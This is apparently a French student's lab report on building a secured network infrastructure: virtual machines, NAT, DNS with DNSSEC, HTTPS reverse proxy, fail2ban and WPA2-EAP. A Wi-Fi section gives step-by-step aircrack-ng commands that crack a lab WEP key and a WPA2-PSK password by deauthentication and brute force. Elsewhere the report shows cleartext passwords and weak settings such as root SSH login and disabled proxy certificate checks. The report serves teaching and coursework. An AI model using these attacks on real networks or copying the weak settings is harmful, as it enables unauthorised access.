Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :

<syntaxhighlight lang="cisco">
ip access-list extended TRAFIC_VLAN25
permit ip 10.60.15.0 0.0.0.255 any
!
route-map PBR_VLAN25 permit 10
match ip address TRAFIC_VLAN25
set ip next-hop 193.48.57.167
!
interface Vlan25
ip policy route-map PBR_VLAN25
</syntaxhighlight>

Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE
iptables-save > /etc/iptables/rules.v4
</syntaxhighlight>

=== Tests ===
Un client connecté au SSID <code>VM_SERVICES_15</code> obtient une adresse IP dans la plage DHCP (ex. <code>10.60.15.101</code>), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (<code>193.48.57.167</code>).

= Vérifications et tests =

Cette section regroupe l’ensemble des commandes exécutées pour valider le bon fonctionnement de chaque composant de l’infrastructure. Les sorties sont présentées telles qu’obtenues sur les machines concernées.

== Services Web ==

=== Sur Moon (machine de services) ===
Vérification de l’écoute Apache sur les ports 80 et 443 :
<syntaxhighlight lang="bash">
ss -tlnp | grep -E ':80|:443'
</syntaxhighlight>
<pre>
LISTEN 0 128 *:80 *:* users:(("apache2",pid=16838,fd=4),("apache2",pid=16837,fd=4),("apache2",pid=7274,fd=4))
LISTEN 0 128 *:443 *:* users:(("apache2",pid=16838,fd=6),("apache2",pid=16837,fd=6),("apache2",pid=7274,fd=6))
</pre>

Test d’accès HTTPS en local (IPv6) :
<syntaxhighlight lang="bash">
curl -6 https://msalhi.online -I
</syntaxhighlight>
<pre>
HTTP/1.1 200 OK
Date: Fri, 27 Feb 2026 11:04:38 GMT
Server: Apache/2.4.66 (Debian)
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 06 Feb 2026 20:23:53 GMT
ETag: "1515-64a2d916615c9"
Accept-Ranges: bytes
Content-Length: 5397
Vary: Accept-Encoding
Content-Type: text/html
</pre>

=== Sur Solstice (machine mandataire) ===
Test d’accès HTTPS via le proxy inverse (IPv4) :
<syntaxhighlight lang="bash">
curl -4 https://msalhi.online -I
</syntaxhighlight>
<pre>
HTTP/1.1 200 OK
Date: Fri, 27 Feb 2026 11:04:55 GMT
Server: Apache/2.4.66 (Debian)
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 06 Feb 2026 20:23:53 GMT
ETag: "1515-64a2d916615c9"
Accept-Ranges: bytes
Content-Length: 5397
Vary: Accept-Encoding
Content-Type: text/html
</pre>

Vérification des règles NAT :
<syntaxhighlight lang="bash">
iptables -t nat -L POSTROUTING -n -v
</syntaxhighlight>
<pre>
Chain POSTROUTING (policy ACCEPT 8219 packets, 528K bytes)
pkts bytes target prot opt in out source destination
18528 1577K MASQUERADE 0 -- * eth1 0.0.0.0/0 0.0.0.0/0
3254 225K MASQUERADE 0 -- * eth0 10.60.15.0/24 0.0.0.0/0
</pre>
La première règle assure la mascarade pour tout le trafic sortant sur l’interface publique (eth1). La seconde règle (source 10.60.15.0/24 sortant sur eth0) est résiduelle mais ne perturbe pas le fonctionnement.

== fail2ban ==

=== Sur Solstice ===
<syntaxhighlight lang="bash">
fail2ban-client status sshd
</syntaxhighlight>
<pre>
Status for the jail: sshd
|- Filter
| |- Currently failed: 0
| |- Total failed: 12792
| `- File list: /var/log/auth.log
`- Actions
|- Currently banned: 4
|- Total banned: 3114
`- Banned IP list: 134.199.155.127 162.243.33.174 152.42.166.201 206.189.90.119
</pre>

=== Sur Moon ===
<syntaxhighlight lang="bash">
fail2ban-client status sshd
</syntaxhighlight>
<pre>
Status for the jail: sshd
|- Filter
| |- Currently failed: 0
| |- Total failed: 1
| `- File list: /var/log/auth.log
`- Actions
|- Currently banned: 0
|- Total banned: 0
`- Banned IP list:
</pre>

== WPA2‑EAP – FreeRADIUS (sur Moon) ==
Statut du service :
<syntaxhighlight lang="bash">
systemctl status freeradius
</syntaxhighlight>
<pre>
● freeradius.service - FreeRADIUS multi-protocol policy server
Loaded: loaded (/lib/systemd/system/freeradius.service; enabled)
Active: active (running) since ...
</pre>

Test d’authentification local :
<syntaxhighlight lang="bash">
radtest msalhi WifiSecure2026! localhost 1812 testing123
</syntaxhighlight>
<pre>
Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76
User-Name = "msalhi"
User-Password = "WifiSecure2026!"
NAS-IP-Address = 127.0.0.1
NAS-Port = 0
Message-Authenticator = 0x00
Cleartext-Password = "WifiSecure2026!"
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20
</pre>

Configuration du client RADIUS (point d’accès) extraite de <code>/etc/freeradius/3.0/clients.conf</code> :
<pre>
client vlan1_ap1 {
ipaddr = 172.27.0.4
secret = testing123
shortname = cisco-ap1-vlan1
nas_type = cisco
}
client vlan1_ap2 {
ipaddr = 172.27.0.3
secret = testing123
shortname = cisco-ap2-vlan1
nas_type = cisco
}
</pre>

== WPA2‑EAP – Point d’accès (wifi‑E304) ==
Connexion SSH (commande adaptée) :
<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>

Vérification du SSID et de son VLAN :
<pre>
wifi-E304#show dot11 ssid VM_SERVICES_15
SSID Name : VM_SERVICES_15
Status : Enabled
Broadcast SSID : Enabled
VLAN : 25
Authentication Methods : Open EAP, Network-EAP
WPA Key Management : WPA2
</pre>

Vérification des serveurs RADIUS configurés :
<pre>
wifi-E304#show running-config | include radius-server
radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key 7 044F0E151B284249584B56
...
</pre>

Statistiques RADIUS :
<pre>
wifi-E304#show aaa servers
RADIUS: id 7, priority 6, host 192.168.20.2, auth-port 1812, acct-port 1813
State: current UP, duration 794495s
Authen: request 2076, timeouts 1646
Transaction: success 430, failure 411
...
</pre>

Test d’authentification :
<pre>
wifi-E304#test aaa group radius_student25 msalhi WifiSecure2026! legacy
Attempting authentication test to server-group radius_student25 using radius
User was successfully authenticated.
</pre>

Clients associés :
<pre>
wifi-E304#show dot11 associations
802.11 Client Stations on Dot11Radio1:
SSID [VM_SERVICES_15] :
MAC Address IP address Device Name Parent State
a0b3.395a.dcc8 10.60.15.153 unknown - self EAP-Assoc
</pre>

État du VLAN 25 sur l’AP :
<pre>
wifi-E304#show vlan 25
Virtual LAN ID: 25 (IEEE 802.1Q Encapsulation)
vLAN Trunk Interfaces: Dot11Radio0.25, Dot11Radio1.25, GigabitEthernet0.25
</pre>

== WPA2‑EAP – Routeur central (C9200‑E304) ==
Connexion SSH (commande adaptée) :
<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Vérification du VLAN 25 :
<pre>
C9200-E304#show vlan brief | include 25
25 E15-MSalhi active
</pre>

Interface VLAN 25 :
<pre>
C9200-E304#show ip interface brief | include Vlan25
Vlan25 10.60.15.2 YES manual up up
C9200-E304#show ipv6 interface brief | include Vlan25
Vlan25 [up/up]
</pre>

VRRP pour VLAN 25 :
<pre>
C9200-E304#show vrrp brief | include 25
Vl25 25 IPv4 110 0 N Y MASTER 10.60.15.2(local) 10.60.15.1

C9200-E304#show vrrp Vlan25
Vlan25 - Group 25 - Address-Family IPv4
State is MASTER
Virtual IP address is 10.60.15.1
Priority is 110
Master Router is 10.60.15.2 (local)
</pre>

DHCP :
<pre>
C9200-E304#show ip dhcp pool
...
Pool PoolSalhi :
Utilization mark (high/low) : 100 / 0
Total addresses : 254
Leased addresses : 1
Excluded addresses : 150
Current index IP address range Leased/Excluded/Total
10.60.15.156 10.60.15.1 - 10.60.15.254 1 / 150 / 254

C9200-E304#show ip dhcp binding | include 10.60.15
10.60.15.153 ff39.5adc.c800.0100. Feb 27 2026 08:59 PM Automatic Active Vlan25
</pre>

Policy‑Based Routing (PBR) :
<pre>
C9200-E304#show route-map PBR_VLAN25
route-map PBR_VLAN25, permit, sequence 10
Match clauses:
ip address (access-lists): TRAFIC_VLAN25
Set clauses:
ip next-hop 193.48.57.167
Policy routing matches: 3128 packets, 1082288 bytes

C9200-E304#show ip access-lists TRAFIC_VLAN25
Extended IP access list TRAFIC_VLAN25
10 permit ip 10.60.15.0 0.0.0.255 any (3128 matches)

C9200-E304#show ip policy
Interface Route map
Vlan25 PBR_VLAN25
</pre>

Trunk vers le point d’accès :
<pre>
C9200-E304#show interfaces trunk
Port Mode Encapsulation Status Native vlan
Gi1/0/1 on 802.1q trunking 1

Port Vlans allowed and active in management domain
Gi1/0/1 1-2,11-12,15-16,19-20,23-25,28,530

C9200-E304#show interfaces GigabitEthernet1/0/1 switchport
Name: Gi1/0/1
Switchport: Enabled
Administrative Mode: trunk
Operational Mode: trunk
Trunking VLANs Enabled: ALL
</pre>

== Réseau basique et avancé ==

Routes sur E304 :
<pre>
C9200-E304#show ip route | include 10.60.15
C 10.60.15.0/24 is directly connected, Vlan25

C9200-E304#show ip route 0.0.0.0
Gateway of last resort is 193.48.57.162 to network 0.0.0.0
O*E2 0.0.0.0/0 [110/1] via 193.48.57.162, Vlan2
</pre>

Connectivité depuis Moon vers la passerelle VLAN 25 :
<syntaxhighlight lang="bash">
ping -c 3 10.60.15.1
</syntaxhighlight>
<pre>
PING 10.60.15.1 (10.60.15.1) 56(84) bytes of data.
64 bytes from 10.60.15.1: icmp_seq=1 ttl=253 time=1.35 ms
64 bytes from 10.60.15.1: icmp_seq=2 ttl=253 time=2.09 ms
64 bytes from 10.60.15.1: icmp_seq=3 ttl=253 time=1.17 ms

--- 10.60.15.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 1.171/1.536/2.091/0.398 ms

----

= Conclusion =
L’infrastructure déployée répond à toutes les exigences du projet :
* Virtualisation Xen avec séparation des rôles (services / mandataire)
* Services sécurisés : SSH redirigé, DNS maître/esclave avec DNSSEC, HTTPS avec certificat Gandi, proxy inverse IPv4
* Filtrage des attaques par fail2ban
* Réseau redondant avec VRRP, DHCP, et Policy‑Based Routing
* WiFi sécurisé par WPA2‑EAP avec FreeRADIUS
* Tests d’intrusion concluants sur WEP et WPA2‑PSK
* Chiffrement de données avec LUKS

L’ensemble est fonctionnel et démontre une maîtrise des technologies mises en œuvre.

Fichier:Wpa-wps.png

2026-02-27T12:53:58Z

Msalhi :

effracage

Atelier SysRes SE4 2025/2026 E15

2026-02-27T12:51:17Z

Msalhi :

<div class="titlepage">

<div class="figure">

[[File:polytech_logo.png|image]]

</div>
'''Rapport de Projet SE4 IdO''' '''Année Universitaire 2025-2026'''

'''Étudiant: Mohamed SALHI''' '''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''

'''Domaine: <code>msalhi.online</code>'''
</div>
= Introduction =

Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.

L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :

* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse
* Une infrastructure réseau redondante avec routeurs Cisco C9200
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)


= Atelier système et réseau - Machines virtuelles =


== Création des machines virtuelles ==

Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 <code>capbreton.plil.info</code>.


=== Commandes de création ===

<syntaxhighlight lang="bash"># Création de la machine de services SE4.Moon
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force

# Création de la machine mandataire SE4.Solstice
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force</syntaxhighlight>

=== Démarrage et connexion ===

<syntaxhighlight lang="bash"># Démarrage des VMs
xen create /etc/xen/SE4.Moon.cfg
xen create /etc/xen/SE4.Solstice.cfg

# Connexion aux consoles
xen console SE4.Moon
xen console SE4.Solstice

# Liste des VMs actives
root@capbreton:~# xen list
Name ID Mem VCPUs State Time(s)
SE4.Solstice 39 2048 1 -b---- 2560.1
SE4.Moon 119 2048 1 -b---- 452.3</syntaxhighlight>

== Configuration de la machine de services (SE4.Moon) ==


=== Montage des partitions LVM pour /var et /home ===

<syntaxhighlight lang="bash"># Création des fichiers de partition sur le Dom0
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual

# Modification du fichier de configuration Xen
disk = [
'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.Moon.home,xvdb,w',
'phy:/dev/virtual/SE4.Moon.var,xvdc,w',
]</syntaxhighlight>

=== Formatage et montage des partitions ===

<syntaxhighlight lang="bash"># Formatage des partitions
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc

# Montage temporaire et copie des données
mount /dev/xvdc /mnt
mv /var/* /mnt/
umount /mnt

mount /dev/xvdb /mnt
mv /home/* /mnt/
umount /mnt

# Configuration du fstab
cat > /etc/fstab << EOF
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb /home ext4 defaults 0 2
/dev/xvdc /var ext4 defaults 0 2
EOF

# Application des modifications
mount -a</syntaxhighlight>

=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface réseau privée (vers Solstice)
auto eth0
iface eth0 inet static
address 192.168.20.2/24
gateway 192.168.20.1

# Configuration IPv6 automatique
iface eth0 inet6 auto

# Vérification
root@Moon:~# ip a show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0
inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic</syntaxhighlight>

=== Installation des paquets de base ===

<syntaxhighlight lang="bash">apt update && apt upgrade -y
apt install -y ssh apache2 bind9 bind9utils \
fail2ban openssl iptables-persistent \
net-tools curl wget vim</syntaxhighlight>

== Configuration de la machine mandataire (SE4.Solstice) ==


=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface publique (réseau routé)
auto eth1
iface eth1 inet static
address 193.48.57.167/27
gateway 193.48.57.162 # Adresse VRRP virtuelle

iface eth1 inet6 auto

# Interface privée (vers Moon)
auto eth0
iface eth0 inet static
address 192.168.20.1/24

iface eth0 inet6 auto

# Vérification
root@Solstice:~# ip a show eth1
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1
inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic</syntaxhighlight>

=== Mise en place de la mascarade (NAT) ===

<syntaxhighlight lang="bash"># Activation du forwarding IP
echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf
sysctl -p

# Règles iptables pour la mascarade
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT

# Sauvegarde pour persistance
iptables-save > /etc/iptables/rules.v4

# Ajout dans interfaces pour chargement au démarrage
post-up iptables-restore < /etc/iptables/rules.v4</syntaxhighlight>

= Services Internet =


== Serveur SSH ==


=== Configuration SSH sur Moon ===

<syntaxhighlight lang="bash"># Édition du fichier de configuration
vim /etc/ssh/sshd_config

# Modifications apportées :
PermitRootLogin yes
PasswordAuthentication yes
Port 22
# LogLevel VERBOSE

# Redémarrage du service
systemctl restart ssh
systemctl enable ssh</syntaxhighlight>

=== Redirection de ports pour l’accès IPv4 ===

<syntaxhighlight lang="bash"># Redirection du port 2201 vers Moon (SSH)
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \
-j DNAT --to-destination 192.168.20.2:22

iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT

# Sauvegarde
iptables-save > /etc/iptables/rules.v4

# Test de la redirection
ssh -p 2201 root@193.48.57.167 # Arrive sur Moon</syntaxhighlight>

== Serveur DNS ==


=== Configuration du serveur maître (Moon) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Fichier de zone /etc/bind/zones/db.msalhi.online
$TTL 86400
@ IN SOA ns1.msalhi.online. admin.msalhi.online. (
2026020320 ; Serial INCRÉMENTÉ et corrigé
3600 ; Refresh
1800 ; Retry
604800 ; Expire
86400 ; Minimum TTL
)

; Serveurs de noms
@ IN NS ns1.msalhi.online.
@ IN NS ns1.merteuil.tech.

; Enregistrements
@ IN A 193.48.57.167
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548
ns1 IN A 193.48.57.167
ns1 IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548

www IN CNAME msalhi.online.

# Vérification
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online</syntaxhighlight>

=== Configuration du serveur secondaire (Solstice) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Redémarrage et vérification
systemctl restart bind9
ls -la /var/lib/bind/db.msalhi.online</syntaxhighlight>

=== Configuration chez le registrar Gandi ===

{| class="wikitable"
|+ Configuration DNS chez Gandi
|-
! style="text-align: left;"| '''Type'''
! style="text-align: left;"| '''Valeur'''
! style="text-align: left;"| '''Description'''
|-
| style="text-align: left;"| Nameservers
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| Serveur DNS primaire
|-
| style="text-align: left;"|
| style="text-align: left;"| ns1.merteuil.tech
| style="text-align: left;"| Serveur DNS secondaire
|-
| style="text-align: left;"| Glue Record 1
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7
|-
| style="text-align: left;"| Glue Record 2
| style="text-align: left;"| ns2.msalhi.online
| style="text-align: left;"| IPv4: 193.48.57.167
|}


== Sécurisation de site Web par certificat ==


=== Génération du CSR et obtention du certificat ===

<syntaxhighlight lang="bash"># Génération de la clé privée
openssl genrsa -out /etc/ssl/private/myserver.key 2048

# Génération du CSR
openssl req -new -key /etc/ssl/private/myserver.key \
-out /etc/ssl/private/server.csr</syntaxhighlight>

=== Configuration Apache sur Moon (HTTPS direct IPv6) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-ssl.conf
<VirtualHost *:80>
ServerName msalhi.online
ServerAlias www.msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online
ServerAlias www.msalhi.online

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
Header always set X-Frame-Options DENY
Header always set X-Content-Type-Options nosniff

ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log
CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined
</VirtualHost>

# Activation
a2enmod ssl
a2ensite msalhi-ssl.conf
systemctl restart apache2</syntaxhighlight>

=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-proxy.conf
<VirtualHost *:80>
ServerName msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

SSLProxyEngine on
ProxyPreserveHost On

# Utilisation de l'URL avec nom de domaine comme demandé
ProxyPass / https://msalhi.online/
ProxyPassReverse / https://msalhi.online/

SSLProxyVerify none
SSLProxyCheckPeerCN off

ErrorLog ${APACHE_LOG_DIR}/proxy_error.log
CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined
</VirtualHost>

# Activation des modules
a2enmod proxy proxy_http ssl
a2ensite msalhi-proxy.conf
systemctl restart apache2</syntaxhighlight>

== Sécurisation de serveur DNS par DNSSEC ==


=== Configuration DNSSEC automatique ===

<syntaxhighlight lang="bash"># Création du répertoire pour les clés
mkdir -p /etc/bind/keys
chown bind:bind /etc/bind/keys

# Ajout dans named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

# Politique DNSSEC dans named.conf.options
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

# Redémarrage et vérification
systemctl restart bind9
dig @localhost msalhi.online DNSKEY +dnssec</syntaxhighlight>

=== Résultat des clés DNSSEC générées ===

<pre>; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec

msalhi.online. 3600 IN DNSKEY 256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==
msalhi.online. 3600 IN DNSKEY 257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==
msalhi.online. 3600 IN DNSKEY 257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==</pre>

=== Enregistrement de la KSK chez Gandi ===

{| class="wikitable"
|+ Configuration DNSSEC chez Gandi
|-
! style="text-align: left;"| '''Paramètre'''
! style="text-align: left;"| '''Valeur'''
|-
| style="text-align: left;"| Algorithm
| style="text-align: left;"| 13 (ECDSAP256SHA256)
|-
| style="text-align: left;"| Flags
| style="text-align: left;"| 257 (KSK)
|-
| style="text-align: left;"| Public Key
| style="text-align: left;"| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==
|}

= Effraction WiFi =

== Cassage de clef WEP d’un point d’accès WiFi ==
Le réseau cible était <code>cracotte01</code> (BSSID <code>04:DA:D2:9C:50:50</code>, canal 4). La procédure a été réalisée depuis la machine <code>zabeth13</code> avec les outils <code>aircrack-ng</code>.

<ol>
<li>Passage de la carte en mode monitor :
<syntaxhighlight lang="bash">sudo airmon-ng start wlan0</syntaxhighlight>
</li>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon</syntaxhighlight>
</li>
<li>Authentification fake (association au point d’accès) :
<syntaxhighlight lang="bash">sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Attaque ARP replay pour générer du trafic :
<syntaxhighlight lang="bash">sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :
<syntaxhighlight lang="bash">sudo aircrack-ng capture_wep-01.cap</syntaxhighlight>
</li>
</ol>

La clé WEP a été trouvée en moins de 15 minutes : <code>FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE</code>.

== Cassage de mot de passe WPA‑PSK par force brute ==
Le réseau <code>kracotte01</code> (BSSID <code>44:AD:D9:5F:87:00</code>, canal 13) utilisait WPA2‑PSK.

<ol>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon</syntaxhighlight>
</li>
<li>Désauthentification d’un client (identifié <code>40:A5:EF:01:25:8B</code>) pour forcer un handshake :
<syntaxhighlight lang="bash">sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon</syntaxhighlight>
</li>
<li>Après apparition du message '''“WPA handshake”''' dans <code>airodump‑ng</code>, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :
<syntaxhighlight lang="bash">crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap</syntaxhighlight>
</li>
<li>Résultat : le mot de passe <code>66689666</code> a été découvert après environ 30 minutes.</li>
</ol>

Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.

----

= Sécurisations =

== Chiffrement de données ==
Sur Moon, une partition supplémentaire (disque virtuel <code>xvdb</code>, correspondant au volume LVM <code>SE4.Moon.home</code>) a été chiffrée avec LUKS.

<syntaxhighlight lang="bash">
# Chiffrement de la partition
cryptsetup luksFormat /dev/xvdb

# Ouverture du conteneur
cryptsetup open /dev/xvdb home_crypt

# Création d’un système de fichiers
mkfs.ext4 /dev/mapper/home_crypt

# Montage manuel
mount /dev/mapper/home_crypt /mnt/secret
</syntaxhighlight>

Pour automatiser le montage au démarrage, on ajoute dans <code>/etc/crypttab</code> :
<pre>
home_crypt /dev/xvdb none luks
</pre>
et dans <code>/etc/fstab</code> :
<pre>
/dev/mapper/home_crypt /home ext4 defaults 0 2
</pre>

Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.

== Filtrage des services – fail2ban ==
Pour protéger SSH et les requêtes DNS malveillantes, <code>fail2ban</code> a été installé sur Moon et Solstice.

Fichier <code>/etc/fail2ban/jail.local</code> :
<pre>
[DEFAULT]
bantime = 3600
findtime = 600
maxretry = 3

[sshd]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 3

[named-refused-tcp]
enabled = true
port = domain,953
protocol = tcp
filter = named-refused
logpath = /var/log/named/security.log
maxretry = 3
</pre>

Filtre <code>/etc/fail2ban/filter.d/named-refused.conf</code> :
<pre>
[Definition]
failregex = ^\S+ named\[\d+\]: client <HOST>#\S+ .* query .* denied
ignoreregex =
</pre>

Le service est démarré et activé :
<syntaxhighlight lang="bash">
systemctl enable fail2ban
systemctl restart fail2ban
</syntaxhighlight>

== Sécurisation WiFi par WPA2‑EAP ==

=== Serveur FreeRADIUS sur Moon ===
Installation :
<syntaxhighlight lang="bash">
apt install freeradius freeradius-utils -y
</syntaxhighlight>

Ajout du client (point d’accès) dans <code>/etc/freeradius/3.0/clients.conf</code> :
<pre>
client vlan1_ap1 {
ipaddr = 172.27.0.4 # VLAN 1 management
secret = testing123
shortname = cisco-ap1-vlan1
nas_type = cisco
}
client vlan1_ap2 {
ipaddr = 172.27.0.3 # VLAN 1 management
secret = testing123
shortname = cisco-ap2-vlan1
nas_type = cisco
}

</pre>

Création d’un utilisateur dans <code>/etc/freeradius/3.0/users</code> :
<pre>
"msalhi" Cleartext-Password := "WifiSecure2026!"

"etudiant1" Cleartext-Password := "Password123"

"prof" Cleartext-Password := "AdminSE4!"

</pre>

Configuration EAP pour PEAP‑MSCHAPv2 dans <code>/etc/freeradius/3.0/mods-enabled/eap</code> (type par défaut <code>peap</code>, tunnel intérieur <code>mschapv2</code>).
Un conflit de port (18120) a été résolu en commentant la section <code>listen</code> dans <code>/etc/freeradius/3.0/sites-enabled/inner-tunnel</code> (ou en mettant <code>port = 0</code>).

Test local :
<syntaxhighlight lang="bash">
radtest msalhi WifiSecure2026! localhost 0 testing123

